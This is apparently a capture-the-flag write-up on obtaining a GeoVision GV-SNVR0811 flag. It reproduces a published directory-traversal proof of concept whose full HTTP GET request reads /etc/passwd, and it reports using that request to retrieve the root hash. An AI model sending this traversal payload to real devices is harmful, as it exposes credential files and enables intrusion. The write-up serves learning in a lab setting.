GeoVision Flag

Fri, 07 Aug 2020 23:33:44

Doing a search of GeoVision GV-SNVR0811 + exploit in Google netted us with a ton of results with the following exploit.


# Exploit Title: GeoVision GV-SNVR0811 Directory Traversal
# Exploit Author: Berk Dusunur
# Google Dork: N/A
# Type: Hardware
# Date: 2018-07-21
# Vendor Homepage:
# Software Link:
# Affected Version: N/A
# Tested on: Parrot OS
# CVE : N/A

# Proof Of Concept

GET Request

GET ../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


HTTP/1.1 200 OK
Server:Cross Web Server
Content-length: 59
Content-type: application/octet-stream


Using this exploit

We put this exploit into postman, with the header configuration. We ran the request, and got the root hash.

SOHOplessly Brokenknown exploiteasy

Fortinet Flag

Nuuo NVR Mini Flag